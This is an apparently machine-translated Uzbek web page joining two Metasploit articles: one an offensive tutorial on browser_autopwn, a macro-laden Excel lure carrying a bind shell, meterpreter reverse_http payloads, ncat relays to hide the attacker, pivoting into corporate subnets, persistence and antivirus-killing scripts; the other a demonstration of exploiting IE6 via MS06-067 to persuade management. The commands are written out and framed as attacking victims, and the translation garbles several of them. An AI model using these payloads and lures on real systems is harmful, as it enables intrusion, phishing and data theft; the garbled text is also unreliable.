Aslida, ushbu modul HTTP serverini ko'taradi va uning ustida brauzerlar uchun barcha ekspluatatsiyalarni oshiradi. Jabrlanuvchi bizning serverimizga tashrif buyurganida, modul brauzer versiyasini va OTni aniqlaydi va keyin tegishli ekspluatatsiyani ishga tushiradi. Hozircha modulning asosiy xususiyati brauzer/OS versiyasini aniq aniqlashdir. Server va mijozni aniqlash imkoniyatlaridan (JavaScript) foydalaniladi. Ya'ni, modulni boshqa foydalanuvchi-agentni almashtirish orqali aldash, albatta, mumkin bo'lmaydi.

Mavjud ekspluatatsiyalardan brauzerlarning eski maktab versiyalari yaxshi ishlaydi, lekin eng yaxshi tomoni shundaki, siz shunchaki o'zingizning ekspluatatsiyalaringizni qo'shishingiz mumkin va bu allaqachon kuchli. Bu bepul talon bo'lib chiqadi.

Kelgusi versiyalarda ular ekspluatatsiyalarni (antivirus dasturlari ularni yoqib yubormasligi uchun) va yuklarni tanlash imkoniyatlarini qo'shishga va'da berishadi.

Masalan, 192.168.0.102 qobiqlari uchun backconnect bilan server yarataylik:

msf> server/browser_autopwn-dan foydalaning
msf> LHOST 192.168.0.102 ni o'rnating
msf> URI indeksini o'rnating.php
msf> exploit -j

VBA

EasyHack bo'limida men allaqachon MSF yordamida troyanlarni yaratish haqida yozganman, lekin exe fayllarini yuborish juda yomon. Bugungi kunda foydalanuvchilar qo'rqoq bo'lib qolishdi va qo'llariga tushgan hamma narsani ochmaydilar va Windows-dan ogohlantirishlar ham bor. Ba'zi ofis fayllarini ishlatish ancha og'riqli:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

Keyinchalik, biz, masalan, "Xodimlarning ish haqi" dahshatli nomli Excel hujjatini yaratamiz. Keyin biz hosil bo'lgan VBA-ni ochamiz, so'l matnni (MAKRO KOD) hujjat makrosiga (Asboblar -> Makro -> VB muharriri) va hujjat oxirida - bizning "yuklash" (PAYLOAD DATA) ni kiritamiz. Hujjatning boshiga go'zallik uchun ba'zi hisob-kitoblarni qo'shishingiz mumkin. Makroslar sukut bo'yicha o'chirilganligi sababli (men bilishimcha OfficeXP versiyasidan), keyin "Diqqat! Ma'lumotlar bazasi bilan ishlash faqat makroslar yoqilganda mumkin. Ularni yoqish uchun "Asboblar -> Variantlar -> Xavfsizlik -> Makro himoyasi -> Past" -ga o'ting va hujjatni qayta ishga tushiring", siz foydalanuvchini makroslarni yoqishga majbur qilishingiz mumkin. Natijada, qobiq 5555 portida joylashgan.

Semantik yuk

Aslida, ekspluatatsiyalar uchun foydali yukni tanlash muhim masala. Ammo MSFda ularning ko'pi bor, shuning uchun men umumiy tushunchaga ega bo'lish uchun ularni bir oz (asosan Win* da) ko'rib chiqaman. Birinchidan, OS, shuningdek, dasturiy ta'minot va yuklanadigan tarjimonlar (ruby, Perl) bo'yicha umumiy bo'linish mavjud.

Ta'rif bo'yicha umumiy bo'linish:

  • “Inline” deb belgilanganlar “butun” qobiq kodlaridir. Ular katta, shuning uchun ular har doim ham ekspluatatsiyalarga mos kelmaydi;
  • "Stager" - qismlarga bo'lingan yuklar. Ekspluatatsiya kichik qobiq kodini o'z ichiga oladi, asosan ulanishni o'rnatish uchun, qolganlari ulanish paytida yuklanadi;
  • "Ord" - "o'tkir" yuklar. Kichik o'lchamli, lekin tizimning DLL xotirasidagi statik manzillarga bog'langan;
  • "Bind" - portni oching va ulanishni kuting;
  • "Teskari" - orqaga ulanish qobig'i;
  • "Findport" - ekspluatatsiya ishlagan rozetka uchun qidiruv amalga oshiriladi, so'ngra u orqali qobiq ochiladi. Qidiruv port raqami bo'yicha amalga oshiriladi;
  • "Findtag" - oldingisiga o'xshash, faqat rozetka xakerdan 4 baytlik teg kelishini kutish uchun mavjud bo'lgan barcha narsalarni tinglash orqali aniqlanadi.;
  • “Exec, Download_exec, Up_exec” – buyruqni ishga tushirish, yuklab olish/yuklab olish va ishga tushirish uchun qobiq kodi;
  • "VNC" - qurbonning VNC serverini ishga tushirish;
  • "dllinjection" - jarayon xotirasiga DLL-ni yuklash. DLL in'ektsiyasining ikki turi mavjud;
  • "metsvc" - jabrlanuvchiga butun hisoblagichni yuklab oladi va uni xizmat sifatida ro'yxatdan o'tkazadi;
  • "PassiveX" - bizning qobig'imiz ActiveX elementi sifatida ishlaydi.
  • "NoNX" - DEP xotirasini himoya qilish mexanizmini chetlab o'tuvchi qobiq kodlari;
  • "DNS" - IP orqali emas, balki xost nomlari bilan ishlashi mumkin bo'lganlar;
  • "HTTPS" shifrlangan HTTPS protokoli yordamida aloqa o'rnatadigan qobiqdir (kechirasiz, proksi-server qo'llab-quvvatlanmaydi).

Men PassiveX-ga bir oz e'tibor qarataman, chunki ular juda yaxshi.
Xulosa shuki, bizning qobiqimiz ActiveX elementi sifatida ro'yxatga olingan va o'zaro ta'sir HTTP protokoli yordamida IE ning yashirin versiyasi orqali amalga oshiriladi. Bu, ayniqsa, har bir kishi NAT ortida o'tiradigan va faqat korporativ proksi-serverdan HTTP trafigiga ruxsat beruvchi umumiy xavfsizlik devori bo'lgan korporativ tarmoqni buzsangiz, juda yaxshi. Bunday holda, boshqa hech qanday yuk yordam bermaydi, ayniqsa proksi-server sozlamalarini bilmasangiz. Va bu erda - proksi-serverning barcha sozlamalari va undagi autentifikatsiya (agar u mavjud bo'lsa) allaqachon IE-da ro'yxatdan o'tgan.

Keling, buning uchun yuk va tinglash qurilmasini yaratamiz (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> exploit/multi/handler-dan foydalaning
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Bundan tashqari, agar oldin PassiveX faqat IE6 ostida ishlagan bo'lsa, endi IE7/8 bilan hammasi yaxshi.

Keyinchalik, oddiy qobiqlar haqida. Oddiy qobiq, albatta, yaxshi, lekin agar siz meterpreterdan foydalansangiz, unga qaytishni xohlaysiz.
Va endi bizda bunday imkoniyat bor. Faraz qilaylik, bizning qurbonimiz (192.168.0.101) allaqachon 5678 portida oddiy bog'lovchi qobiq o'rnatilgan.

Keling, unga MSF-dan ulanamiz:

msf> exploit/multi/handler-dan foydalaning
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

Aytmoqchimanki, keyingi buyruq bilan biz oddiy qobiqni hisoblagichga aylantiramiz, ammo omad yo'q. MSF shunchaki meterpreter backconnect-ni yuklaydi va uni ishga tushirib, boshqa seans yaratadi (boshqa ulanish yaratiladi). Garchi bu ham yomon emas. Ammo hamma narsa ishlashi uchun biz xostimizning global qiymatlarini o'rnatishimiz kerak (teskari bog'langan joyda) va keyin sessiyani "yangilash" kerak (keling, "1" deb faraz qilaylik):

msf> setg LHOST 192.168.0.102
msf> o'rnating LPORT 6666
msf> seanslar – u 1

Natijada, biz muntazam qobiqning juda ko'p stressi va cheklovlaridan xalos bo'lamiz.

Aytgancha, metrpreter haqida. Ular uzoq vaqt davomida uni boshqa platformalarga (linux, Macos) o'tkazishga harakat qilishdi, ammo hozircha hammasi yaxshi ketayotgani yo'q. Ammo baribir yaxshi yangilik bor: meterpreter qandaydir shaklda PHP ga ko'chirildi! "Ba'zi turdagi" da, chunki barcha funktsiyalarni PHP tomonidan amalga oshirib bo'lmaydi, lekin asosiylari allaqachon mavjud. Shunday qilib, siz uni haddan tashqari yuklangan serveringizga yuklashingiz va shunday ajoyib qobiq bilan o'ynashingiz mumkin.

Keling, o'zimizning "xavfsizligimiz" haqida gapiraylik. Hozirgi vaqtda MSF modullarining aksariyati proksi-serverlarni qo'llab-quvvatlamaydi, ayniqsa jangovar ish yuklari uchun. Axir, biz aniqlanishni xohlamaymiz :). Shuning uchun, keling, eski maktab xususiyatini eslaylik - portforwarding.

Faraz qilaylik, MSF bilan serverimiz qobiqlarning qayta ulanishini kutmoqda va "192.168.0.103:5555" da joylashgan. Keyin biz netcat-ni 80-portdagi soxta serverga o'rnatamiz:

ncat --sh-exec “ncat 192.168.0.103 5555” –l 80 --keep-open

Va foydali yuklarda biz soxta serverning IP (yoki DNS) va portini ro'yxatdan o'tkazamiz.
Aytgancha, netcat SSL-ni qo'llab-quvvatlaydi, shuning uchun qobiqning o'zi bunga ruxsat bermasa, siz trafikni shifrlashingiz mumkin.

Ekspluatatsiyadan keyingi

Ha, endi eng mazali qismga - ekspluatatsiyadan keyingi va metrpreterga o'tamiz. Umid qilamanki, siz meterpreter bilan tanishsiz, chunki men sizga uning qanchalik yaxshi ekanligini ayta olmayman (va deyarli hech qanday iz qoldirmaydi va chroot-da ishlaydi) va funktsional (o'rnatilgan hack vositalari, ro'yxatga olish kitobi va fayl tizimini o'zgartirish, jarayonlar va tokenlar bo'ylab migratsiya, marshrutlash) Menda hech qanday xohish yo'q :).

Tasavvur qilaylik, biz korporativ tarmoqdagi kompyuterlardan biriga (192.168.146.129) kirish huquqiga ega bo'ldik va biz (192.168.0.102) o'z muvaffaqiyatimizga asoslanmoqchimiz - pastki tarmoqni skanerlash va boshqa biror narsa qilish.

Msfconsolda marshrutni (subgrid, uning niqobi, marshrutlash uchun seans) qo'shing:

msf> marshrutni qo'shing 192.168.146.0 255.255.255.0 1

Afsuski, nmap bu marshrutdan foydalanishni istamadi - aftidan, integratsiya hali unchalik chuqur emas. Ammo oddiy modullar, ekspluatatsiyalar va skanerlar hujumni ishlab chiqish uchun tinchgina (ya'ni hech qanday maxsus sozlamalarsiz) ishlatilishi mumkin (rasmga qarang) - MSF barcha marshrutlash bilan shug'ullanadi.

Ba'zi xostlar tashqi tarmoqqa kirish imkoniyati cheklangan bo'lishi mumkinligi sababli (biz joylashgan joyda), ular bilan bog'lanish uchun siz allaqachon qilingan jabrlanuvchiga portni yo'naltirishdan foydalanishingiz mumkin, xayriyatki, meterpreter buni amalga oshirishi mumkin:

meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

Endi biz ekspluatatsiyalarning foydali yuklariga LHOST=192.168.146.129, LPORT=8008 yozamiz va hamma narsa ajoyib bo'ladi.

Meterpreter ajoyib xususiyatga ega - Ruby skriptlari orqali harakatlarni avtomatlashtirish. Bu juda ajoyib. Mavjud skriptlarni msf3\scripts\meterpreter-da ko'rishingiz mumkin; undan foydalanganda run va Tab ni ikki marta yozing (bilmaganlar uchun:). Siz skriptlarni ishga tushirish buyrug'i orqali qo'lda yoki yuk/serverni sozlashda AutoRunScript yoki InitialAutoRunScript o'zgaruvchisini belgilash orqali ishga tushirishingiz mumkin. Ikkinchi o'zgaruvchi qobiq ishga tushirilgunga qadar, birinchisi - keyin bajariladi.

To'plamga allaqachon eng standartidan boshlab juda ko'p skriptlar kiritilgan:

  • winenum - tarmoq sozlamalaridan o'rnatilgan dasturiy ta'minot va xeshlarga qadar tizim haqidagi barcha ma'lumotlarni tezda to'playdi;
  • qat'iylik, metsvc - registrda yoki xizmat sifatida avtomatik ishga tushirish uchun meterpreterni ro'yxatdan o'tkazadi;
  • getcountermeasure - yong'inni o'chiradi, turli antiviruslar va xavfsizlik devorlarining jarayonlarini o'ldirishi mumkin.

Xulosa o'rniga

Maqolada men yangi narsalarni tasvirlashga harakat qildim (hech bo'lmaganda rus tilidagi manbalar uchun) va shu bilan birga xakerlikning barcha bosqichlari haqida, shuning uchun bu siz uchun foydali bo'ladi deb umid qilaman. Bundan tashqari, amalga oshirilishi kerak bo'lgan bir nechta ajoyib g'oyalar tug'ildi va MFS-da bir nechta yomon xatolar mavjud edi, umid qilamanki, ular nashr etilishi bilan yo'q qilinadi. Umuman olganda, yaratish ajoyib!

Bir nechta maslahatlar:

  • Avtomatik yakunlash Tab tugmasini bosish orqali msfconsolda ajoyib ishlaydi va barcha buyruqlar “-h” parametri bilan yordam beradi.
  • Agar siz buyruqni bajarishni to'xtatmoqchi bo'lsangiz - Ctrl + C, uni fonga yuboring - Ctrl + Z.
  • Cygwin-da matndan nusxa ko'chirish sichqonchaning chap/o'ng tugmalari yordamida amalga oshiriladi, joylashtirish Shift + Insert.
  • Windows ostida msfcli, msfpayload va hokazo interfeyslarga kirish. cygwin konsoli orqali amalga oshiriladi. Ammo uni sinchkovlik bilan sinab ko'rish tavsiya etiladi, chunki barcha funktsiyalar etarli darajada ishlamasligi mumkin.

PAVEL TROITSKY

Metasploit Framework yordamida zaifliklarni o'rganish

O'rganish hech qachon kech emas, boshqalarga o'rgatish esa yoqimli tajriba... Ushbu maqoladan Metasploit Framework yordamida ko'pchilik zaifliklarning ishlashini qanday sodda va aniq ko'rsatish mumkinligini bilib olishingiz mumkin.

Hayotda sodir bo'ladigan hamma narsa yaxshi tomonga... Bir shanba kuni ertalab men jasorat bilan ishlashga majbur bo'ldim. Qabul qiling, bu eng yoqimli mashg'ulot emas, ayniqsa dam olish kunida. Ammo vaziyatga boshqa tomondan qarash mumkin.

Ertalabki bir necha soatlik ishdan so'ng, men bo'shashib, harakatda uyqu holatida bo'lganimda, men uyga qaytish istagini his qilmadim. Shovqinli kundalik hayotga nisbatan tinchlantiruvchi sukunat hukm surayotgan koridor bo‘ylab suzib ketdim. Qiziquvchanlik qanday paydo bo'lganini eslay olmayman; uzoqdan klaviaturadagi tugmachalarni tez bosishning xarakterli tinimsiz tovushlarini eshitib, men avtopilotda kursni o'zgartirdim va keyingi bo'limga o'tirdim.

Men ishtiyoq bilan ishlaydigan odamlarni tomosha qilishni yaxshi ko'raman. Ma’lum bo‘lishicha, mening ismim va hamkasbim o‘zining ikkita monitori orqasida o‘tirib, biror narsaga qaror qilishayotgan ekan. Bo‘sh o‘rindiqlardan biriga ohista qo‘ndim-da, choynakni yoqdim-da, kutib turdim.

Pashok hayotga qaytdi va choynak qaynab, xona bo'ylab issiqlik o'tkazgichni baland ovoz bilan bosgandagina meni payqab qoldi. Ko'rinishidan, choynakni qo'ymagani ishlagan.

Meni ko'rib, u tezda o'ziga qahva qaynatdi, o'z joyiga o'tirdi va choy ziyofatida menga ruhini to'kib, tushunishi mumkinligidan xursand bo'ldi. Va shunday bo'ldi. U xo'jayini tayinlagan qiziqarli masalani mikrokontrollerlar yordamida hal qilardi, shu bilan birga vaqti yetmayotgan boshqa vazifa haqida o'ylardi.

Ikkinchi vazifa birinchisidan ko'ra qiziqarliroq edi, men buni sizga tasvirlab berishga harakat qilaman va keyin biz o'ylab topgan yechimni taklif qilaman.

Yopiq manba xalq dushmanimi?

Hech kimga sir emaski, texnik bo'lim va uning rahbariyati juda ko'p zaifliklarni o'z ichiga olgan yopiq kodli dasturlardan foydalanadiganlarga hayrat bilan qarashadi. Kompaniya rahbariyati muammoni tushunsa, bu yaxshi. Texnik bo'limga yashil chiroq yonadi va butun tashkilot kompaniya uchun to'g'riroq va xavfsizroq echimlarga o'tadi.

Ammo boshqa holatlar ham borki, rahbariyat do‘stlar va tanishlar fikriga tayanib, o‘zini tushungandek ko‘rsatadi, lekin aslida unday emas.

Misol uchun, Linux, OpenOffice yoki Mozilla Firefox brauzerining yangi versiyalarining afzalliklarini hamma ham qadrlamaydi (ularning yopiq va har doim ham barqaror bo'lmagan hamkasblari: Windows, MSOffice yoki IE bilan solishtirganda).

Odamlar inert, biror narsaga o'rganib qolgan va hech narsani o'zgartirishni xohlamaydilar. Baliq boshidan chiriydi - ma'muriyat texnik bo'limga o'z kompyuterlariga (ayniqsa, noutbuklarga) kirishga ruxsat bermagan holatlar mavjud, bu nafaqat xavfsizlik buzilishining manbai, balki raqobatchilarning hiyla-nayranglari uchun birinchi maqsaddir.

Vazifaning maqsadi texnik bo'limga vakolatlarni tiklash, xodimlar uchun kirish ma'ruzasini o'qish va o'z xohishiga ko'ra emas, balki yuqoridagi rahbariyatning buyrug'i bilan xavfsizroq ochiq manba analoglarini o'rnatish va o'tish bo'yicha qarorlarni amalga oshirish edi. texnik bo'lim.

Vazifa aniq ko'rinadi, agar siz ko'p yillik tajribaga ega bo'lsangiz, unda siz hayotingiz bilan kesishgan yoki shunga o'xshash narsalarni ko'rgan bo'lishingiz mumkin. Keling, ayyorlik umumiy ish uchun foydali bo'lgan qarorni ko'rib chiqaylik. Agar sizda qiziqarliroq echimlar bo'lsa, jurnal forumiga yozing va biz buni muhokama qilamiz!

Yechim

Qanday davom etish kerak? Deyarli hamma Global tarmoqdan foydalanadi va u har qanday bo'lim uchun jiddiy xavf tug'diradi, biz o'z oldimizga maqsad qo'yamiz - foydalanuvchilarni IE dan foydalanishdan mahrum qilish.

Agar klassikaga murojaat qiladigan bo'lsak, muammolarni hal qilishda turli xil yondashuvlar mavjud emas:

  • agar siz foydalanayotgan brauzerni tekshirsangiz va proksi-serverdagi tarmoqqa IE kirishini o'chirib qo'ysangiz, bu eng yaxshi yechim bo'lmaydi va administratorni "manyak" deb tasniflash mumkin;
  • agar siz barcha foydalanuvchilar uchun IEni o'chirib tashlasangiz, u "ahmoq" administrator bo'ladi va muammo ham hal etilmaydi;
  • agar siz IE bilan ishlaydigan foydalanuvchilarga zarar yetkazmoqchi bo'lsangiz, u "fashist" administrator bo'ladi - u ham muvaffaqiyatga erisha olmaydi, chunki u bor kuchini tergovga qarshi kurashga sarflaydi.

Eng to'g'ri narsa - hiyla ishlatish va sabab bilan kurashish. Tasavvur qiling-a, agar barcha foydalanuvchilar ongli ravishda biron bir yechimdan voz kechsalar, ishlab chiqaruvchining ushbu yechimni ilgari surishining biznes olamida nima keragi bor?

Bizning g'oyamiz uchun eng mos administrator turi "texnik bandit" dir.

Biz brauzerlar qanday ishlashining turli nuanslarini va ulardagi zaifliklarni o'rganamiz, xatolar tufayli yuzaga keladigan yashirin imkoniyatlarni namoyish qiluvchi maxsus dasturlarni o'rnatamiz va shu bilan boshqaruvni to'g'ri qaror qabul qilishga majbur qilamiz.

Zaifliklar uchun tizimingizni tekshiring

Har qanday katta dasturda xatolar borligi aniq haqiqatdir. Buni deyarli hamma tushunadi, shu jumladan menejment ham. Shu sababli, turli xil skanerlar uzoq vaqtdan beri tarmoqlar va shaxsiy xostlarni tekshirish uchun ixtiro qilingan. Ammo hamma ham o'z ishining o'ziga xos xususiyatlarini tushunmaydi.

Agar Nessus, Shadow Security Scanner, nmap, XSpider va boshqalar ma'lum darajada qulay bo'lsa va o'zlarini yaxshi isbotlagan bo'lsa, unda nima sodir bo'layotganini tushunish bilan ularning natijalariga tayanishingiz kerak.

Misol uchun, ba'zi kodning bajarilishi (zaiflikni o'z ichiga olgan) foydalanuvchi tomonida sodir bo'lgan va tashqi skaner tomonidan boshlanmagan hol haqida nima deyish mumkin? Hech kimga sir emaski, ko'pchilik o'z kompyuterini (yoki serverini) skanerdan o'tkazgan va ochiq portlar va zaif xizmatlarni topa olmagan holda, ularning tizimlari mukammal tartibda deb o'ylashadi.

Ushbu xatoni Metasploit Framework dasturidan foydalangan holda IE brauzeri misolida isbotlashga harakat qilamiz.

Harakat rejasi. Bir oz nazariya

Xavfsizlik masalalari bo'yicha turli xil xatlarni olganingizda yoki shunga o'xshash mavzulardagi veb-saytlarga tashrif buyurganingizda, siz vaqti-vaqti bilan turli zaifliklar haqida ma'lumotga duch kelasiz. Falon zaiflik sizga ba'zi kodlarni mijozga o'tkazish va uni o'zi tomonidan bajarish imkonini beradi; falon zaiflik shunchaki dasturni to'xtatadi.

Nazariy jihatdan, u shunday ishlaydi: siz XXX saytiga borasiz va uning o'rniga terminal oynasi ochiladi, u erda siz "format bilan:" buyrug'ini ishga tushirasiz.

Misol abartılı, ammo agar sizga ishonish qiyin bo'lsa, maqolaning oxiriga kelib siz o'zingizning uyingizda shunga o'xshash tajriba o'tkazishingiz mumkin.

Metasploit loyihasi

Bu Metasploit MChJ tomonidan yaratilgan loyiha bo'lib, hujumlarni aniqlash tizimlari (ASA) uchun ma'lumotlar bazalarini ishlab chiqish, shuningdek, zaifliklar va ular qanday ishlashini o'rganish bilan shug'ullanadigan odamlar uchun foydali ma'lumotlarni o'z ichiga oladi.

Resursning maqsadi ma'lum bo'lgan ekspluatatsiyalar va zaifliklar haqida ularni amalga oshiradigan kodlar bilan bir qatorda turli xil ma'lumotlarni to'plash, bu ma'lumotlar xavfsizlik ma'murlari va ishlab chiquvchilari uchun mavjud bo'lishi uchun.

Saytda foydali ma'lumotlarni o'z ichiga olgan bir nechta bo'limlar mavjud.

Bizga rejamiz amalga oshirilishi mumkin bo'lgan platformaga bag'ishlangan Framework bo'limi kerak bo'ladi (1-rasmga qarang).

Quyida Yuklab olish uchun qidiring va framework-3.2.tar.gz ni yuklab oling.

Metasploit Framework-ni o'rnatish

Ilgari dastur faqat CLI (buyruqlar qatori interfeysi) orqali mavjud edi va shuning uchun faqat tor doiralarda ma'lum edi.

GUI (grafik interfeys) qo'llab-quvvatlashi yaqinda qo'shildi, bu dasturni kamroq tajribali foydalanuvchilar uchun yanada jozibador qiladi (ayniqsa, dasturning Windows versiyasi mavjudligi). Bu yaxshi yoki yomonmi, aytish qiyin. Biz Linux uchun versiya va GUI interfeysini tanlaymiz.

Operatsion tizim yaqinda chiqarilgan Fedora 10. Albatta, bu muammosiz emas. Katta ehtimol bilan, olti oydan bir yilgacha kichik muammolar hal qilinadi va u ko'plab ma'murlar uchun ishchi platformaga aylanadi, ammo hozircha u bizning tajribalarimiz uchun juda mos keladi. Agar oldingi versiyalarni olsak (Fedora 8, 9), unda o'rnatishda fundamental farqlar bo'lmasligi kerak.

Grafik interfeys ishlashi uchun siz Ruby tilini va kutubxonalarni o'rnatishingiz kerak:

  • ruby-1.8.6.287-2.fc10.i386.rpm;
  • ruby-libs-1.8.6.287-2.fc10.i386.rpm;
  • ruby-gtk2-0.18.0-2.fc10.i386.rpm;
  • ruby-libglade2-0.18.0-2.fc10.i386.rpm;
  • ruby-atk-0.18.0-2.fc10.i386.rpm;
  • ruby-cairo-1.8.0-1.fc10.i386.rpm;
  • ruby-gdkpixbuf2-0.18.0-2.fc10.i386.rpm;
  • ruby-glib2-0.18.0-2.fc10.i386.rpm;
  • ruby-gnome2-0.18.0-2.fc10.i386.rpm;
  • ruby-gnomecanvas2-0.18.0-2.fc10.i386.rpm;
  • ruby-libart2-0.18.0-2.fc10.i386.rpm;
  • ruby-pango-0.18.0-2.fc10.i386.rpm.

Bu buyruqlar yordamida qo'lda amalga oshirilishi mumkin:

rpm -ihv *.rpm

yoki orqali:

yum o'rnatish ...

keyin faqat dastlabki to'rtta paketni ko'rsatish kifoya, qolganlarning hammasi bog'liq deb aniqlanadi va o'zlari o'rnatiladi.

Keyingi qadam yuklab olingan framework-3.2.tar.gz arxivini katalogga ochish, unga o'tish va administrator huquqlari bilan msfgui faylini ishga tushirishdir.

Administrator huquqlari (ildiz) dastur istalgan portda (masalan, 80, TCP protokoli) tinglash uchun rozetkalarni ochishi uchun kerak.

Dasturni ishga tushirish

Endi zaifliklarni tanlab (ularning ko'pi Metasploit Framework ma'lumotlar bazasida mavjud), biz mijozga o'z tomonida bajarilishi uchun uzatiladigan kodni ishlab chiqaradigan serverni amalga oshirishga harakat qilishimiz mumkin. Va keyin biz mijozni zaiflik uchun tekshiramiz. Birinchisi, Windows 2003 va IE 6.0 bilan zaif mashina sifatida tanlandi (5-rasmga qarang). Aytgancha, ba'zi ma'murlar o'zlarini bezovta qilmasdan, ko'pincha o'zlarini qiziqtirgan savollar bo'yicha Internetda biron bir narsani to'g'ridan-to'g'ri server konsolidan qidiradilar, shu bilan birga ular muqobil brauzerlarni o'rnatmoqchi emaslar, chunki bunday Internetga kirish "bo'limda" server xonasining tizzasi" ular kamdan-kam uchraydi. Shuni ta'kidlash kerakki, serverni buzish uchun faqat bitta voqea kerak!


Va keyin vaziyat oddiy: asosiy vazifa jabrlanuvchini yoki hamma narsani biladigan xo'jayinni kompyuterimizga jalb qilishdir. Internetda bu ijtimoiy, ya'ni aylanma yo'l bilan hal qilinadi. Misol uchun, turli bannerlarni joylashtirish yoki allaqachon zararlangan saytlardan qalqib chiquvchi oynalar orqali qayta yo'naltirish orqali. Bu ko'pincha sizni bannerni bosishga taklif qiladigan shubhali saytlarda (tijorat dasturlarini bepul yuklab olish, porno saytlar va boshqalar) sodir bo'ladi.

Mahalliy tarmoqda, uning ma'murlari bo'lgan holda, biz shlyuzdagi so'rovni kerakli joyda yopishimiz mumkin va keyin xo'jayinga har qanday mutlaqo zararsiz sayt o'z kompyuterida mo''jizalar yaratishi mumkinligini ko'rsatishimiz mumkin (boshqa ilovalarni ishga tushirish, hujjatlarini nusxalash va hk). , agar u hatto antivirus ham ishlayotgan bo'lsa.

Albatta, bu xilma-xil harakatlar sizning tasavvuringizga bog'liq va maqolaning maqsadi faqat yo'nalishni va mumkin bo'lgan narsalarni ko'rsatishdir. Shuning uchun biz misol sifatida faqat bitta zaiflik bilan cheklanamiz va jabrlanuvchining kompyuterida ba'zi zararsiz dasturni ishga tushiramiz, masalan, "Kalkulyator". Hech kimga sir emaski, ushbu maqolani yozish uchun, hech kimni aldamaslik uchun, men ushbu konfiguratsiyada ishlaydigan narsani topish uchun yarim soat davomida zaifliklarni saralashim kerak edi.

Microsoft Xavfsizlik byulleteni MS06-067 da tasvirlangan zaiflik tanlangan - dastur ma'lumotlar bazasida ushbu zaiflikni tanlang (6-rasmga qarang).

Biz 8081 portni va "c:\windows\system32\calc.exe" zaif brauzerli mashinada ishlash buyrug'ini belgilaymiz (8-rasmga qarang).

Eslatma: agar siz 80-portni ro'yxatdan o'tkazmoqchi bo'lsangiz va httpd serverida ishlayotgan bo'lsangiz, uni to'xtatishni unutmang, masalan, buyruq bilan:

# xizmat httpd stop

yoki:

# /etc/rc.d/init.d/httpd stop

Aks holda, ikkita dasturdan qaysi biri kiruvchi ulanishlar uchun portda tinglashi kerakligi aniq emas. Buning uchun misol 8081 portidan foydalanadi, bu aniq bepul bo'ladi.

Sozlamalarni tasdiqlaganimizdan so'ng (9-rasmga qarang) va osilgan ishlar ro'yxatida (ishlar) bizda yangi vazifa bor (10-rasmga qarang).

Jabrlanuvchining mashinasi oynasi (11-rasmga qarang).

Xulosa

Albatta, bu misol ahamiyatsiz va boshqalarni yoki xo'jayiningizni hayratda qoldirish uchun uni o'ziga xos xususiyatlarni hisobga olgan holda o'zgartirish yaxshiroqdir. Biz shunday yaratilganmizki, har qanday harakat (o'zgarish) bizni ko'proq jalb qiladi, shuning uchun bufer qanday to'lib ketishini tushunmaydigan odamlar uchun kalkulyator o'rniga kalitlar bilan arxivatorni ishga tushirgan ma'qul, shunda animatsiya bo'lishi mumkin. oyna, masalan, "Mening hujjatlarim\Maxfiy" jildidan "ishlaydigan" siqilgan foizlar soni. Shunda bu sayt xo'jayiningizning kompyuteridan ma'lumot yig'ishga qaratilganligini aytish osonroq bo'ladi va sizning dalillaringiz kuchliroq bo'ladi. Sayt biron bir kalkulyator emas, balki arxivatorni ishga tushirganligi sababli, muammo ancha jiddiyroq. Garchi ushbu satrlarni o'qiyotgan o'quvchilarning ko'pchiligi yana bir bor tabassum qiladilar deb umid qilaman.

Ushbu maqola va misoldan ta'lim maqsadlarida ham foydalanish mumkin. Nega xavfsizlik kurslari yoki universitetlardagi o'qituvchilar uchun ko'rgazmalar yoki laboratoriya ishlarini o'tkazish bo'yicha qo'llanma emas? Talabalar uchun har doim ham aniq bo'lmagan natijalarni hisoblashdan ko'ra, bunday laboratoriya ishlarini bajarish ancha qiziqarli bo'ladi.

Agar tizimingizni yoki brauzeringizni yangilash/o'zgartirish vaqti keldimi, deb qiziqayotgan bo'lsangiz, demak siz to'g'ri yo'ldasiz!

  1. Robachevskiy A. M. UNIX operatsion tizimi. – Sankt-Peterburg: BHV-Peterburg, 2002, ISBN 5-8206-0030-4.
  2. The Metasploit Project veb-saytida turli zaifliklar haqida ma'lumot va ekspluatatsiyalar mavjud - http://metasploit.com.
  3. Microsoft xavfsizlik byulleteni zaifligi MS06-067 – http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx.

Bilan aloqada